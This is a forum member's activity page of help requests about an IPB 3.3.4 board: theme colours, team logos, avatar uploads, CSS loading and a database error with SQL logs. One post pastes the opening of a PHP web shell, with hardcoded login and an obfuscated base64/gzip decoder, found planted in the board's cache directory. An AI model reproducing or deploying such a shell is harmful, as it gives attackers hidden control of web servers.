sburton

+Clients
  • Content count

    3
  • Joined

  • Last visited


sburton's Activity

  1. sburton added a post in a topic: Teams   

    another question: how can i change the teams table background color for my active theme?
    see attachment below.
     
     
     
    thanks!
  2. sburton added a post in a topic: Teams   

    Hi Mikey,
     
    please could you help me with this: images / logos are not showing up in the sidebar if i try to upload those for my teams.
    i tried different image types and sizes, it seems to upload but i dont see the image. 
     
    thanks for help!
  3. sburton added a post in a topic: [NOT Urgent] Avatars are not uploading   

    hi! i`m discovering the same problem described above at the moment. paths are correct: /upload/profile, chmod 777.
    please could you describe how you fixed it finally? thanks for help!


  4. sburton added a post in a topic: Portal   

    hi! please could somebody tell me how i can change the font size of the floating text inside the portal? its very small by default. thanks for help.
  5. sburton added a post in a topic: Setup on new Host. css not loading?   

    problem solved, thanks Aiwa!
  6. sburton added a post in a topic: Setup on new Host. css not loading?   

    hi!

    i just did a ipb 3.3.4 installation on my new host. everything worked fine during the installation. if i load the board, it seems it can`t connect to the forum themes, there`s obviously something wrong,
    i cant find out the reason. please see the screenshot below.

    thanks for help!
  7. sburton added a post in a topic: Driver Error - Problems with Database?!   

    thanks matt,

    please could you tell me how to submit a ticket?
    i just renamed both files so they are not accessible anymore.
  8. sburton added a post in a topic: Driver Error - Problems with Database?!   

    Ok.. so i just discovered something else:

    the cache directory contains two obscure files: "urlCache.php" and "shell.php", uploaded (last edited?) 10 minutes before the errors above started.
    This is the code of both files:


    <?php //========================================// //========+++I-47 v1.1+++==========// //========================================// //====+++Coded By Arjun+++===// //========================================// //=====+++An Indian Hacker+++=====// //========================================// // Set Username & Password $user = "hacker"; $pass = "hacker"; ?> <?php function DuPV($wqS) { $wqS=gzuncompress(base64_decode($wqS)); for($i=0;$i<strlen($wqS);$i++) { $wqS[$i] = chr(ord($wqS[$i])-1); } return $wqS; [...]
  9. sburton added a post in a topic: Driver Error - Problems with Database?!   

    hi!

    we can`t connect to our board anymore, a driver errror appears:


    There appears to be an error with the database.
    If you are seeing this page, it means there was a problem communicating with our database. Sometimes this error is temporary and will go away when you refresh the page. Sometimes the error will need to be fixed by an administrator before the site will become accessible again.

    You can try to refresh the page by clicking her e

    I just checked the database, it still exists and mysql is working.

    This is the latest SQL Error log:




    Seems that the board can`t load the member database "board.members".
    I checked the database again and this is a bit confusing: the sql tables exist two times: one version without prefix and the other with prefix "bb_".
    conf_global.php doesnt contain any prefix for sql tables, but i remember that we chose "bb_" with the installation. Table "bb_members" exist, but
    not "board.members" or "members".

    Can anybody tell me what happened and how we can fix this?

    Thanks for help!
    ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Date: Fri, 27 Jul 2012 00:02:46 +0000 Error: 1146 - Table 'board.members' doesn't exist IP Address: xx.xxx.xx.xx - /board/index.php?showuser=475&tab=friends&k=bb2fe024f8a71424996db6d9af08c1fc&&k=bb2fe024f8a71424996db6d9af08c1fc&settingNewSkin=2 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- mySQL query error: SELECT m.*, m.member_id as my_member_id,p.*,pp.*,g.*,s.*,ccb.cache_content FROM members m LEFT JOIN pfields_content p ON ( p.member_id=m.member_id ) LEFT JOIN profile_portal pp ON ( pp.pp_member_id=m.member_id ) LEFT JOIN groups g ON ( g.g_id=m.member_group_id ) LEFT JOIN sessions s ON ( s.member_id=m.member_id ) LEFT JOIN content_cache_sigs ccb ON ( ccb.cache_content_id=m.member_id ) WHERE m.member_id=475 .--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------. | File | Function | Line No. | |----------------------------------------------------------------------------+-------------------------------------------------------------------------------+-------------------| | admin/applications/members/modules_public/profile/view.php | [IPSMember].load | 263 | '----------------------------------------------------------------------------+-------------------------------------------------------------------------------+-------------------' | admin/applications/members/modules_public/profile/view.php | [public_members_profile_view]._viewModern | 73 | '----------------------------------------------------------------------------+-------------------------------------------------------------------------------+-------------------' | admin/sources/base/ipsController.php | [public_members_profile_view].doExecute | 302 | '----------------------------------------------------------------------------+-------------------------------------------------------------------------------+-------------------' ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Date: Fri, 27 Jul 2012 00:02:56 +0000 Error: 1146 - Table 'board.members' doesn't exist IP Address: xx.xxx.xx.xx - /board/index.php?app=members&module=list&sort_key=joined&sort_order=asc&max_results=20&quickjump=M&name_box=begins&name=M&st=60&k=bb2fe024f8a71424996db6d9af08c1fc&settingNewSkin=2 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- mySQL query error: SELECT COUNT( * ) as cnt FROM members m LEFT JOIN pfields_content p ON ( p.member_id=m.member_id ) LEFT JOIN profile_portal pp ON ( pp.pp_member_id=m.member_id ) WHERE m.members_l_display_name !='' AND m.members_l_display_name IS NOT NULL AND m.member_group_id NOT IN(5,9) AND m.members_l_display_name LIKE 'm%' .--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------. | File | Function | Line No. | |----------------------------------------------------------------------------+-------------------------------------------------------------------------------+-------------------| | admin/sources/base/ipsController.php | [public_members_list_view].doExecute | 302 | '----------------------------------------------------------------------------+-------------------------------------------------------------------------------+-------------------' ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Date: Fri, 27 Jul 2012 00:05:26 +0000 Error: 1146 - Table 'board.members' doesn't exist

About Me

Status Feed